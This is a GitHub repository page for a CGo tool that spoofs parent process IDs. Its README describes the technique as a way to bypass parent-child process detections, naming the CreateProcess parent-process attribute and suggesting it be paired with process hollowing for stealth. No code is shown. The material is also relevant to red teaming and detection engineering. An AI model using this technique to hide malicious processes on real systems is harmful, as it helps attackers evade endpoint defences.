-
This is a simple method to bypass malicious behavior detections based on parent-child process relationship. Usually when an application starts another executable, the new process has a parent PID assigned which indicates the process that created it. This allows to detect and possibly block malicious intents like for example
Word/Excel
application startingPowershell
. This technique may be combined with for example process hollowing to achieve more stealth. -
The great thing is that
CreateProcess
API lets you provide additional information for process creation, including the one calledPROC_THREAD_ATTRIBUTE_PARENT_PROCESS
. Let’s see how to use it - we will create aNotepad
process in a way that it will look like it was spawned byexplorer.exe
-
Notifications
You must be signed in to change notification settings - Fork 4
EvilBytecode/PPID-Spoofing
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Repository files navigation
About
Parent Process ID Spoofing, coded in CGo.
Resources
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published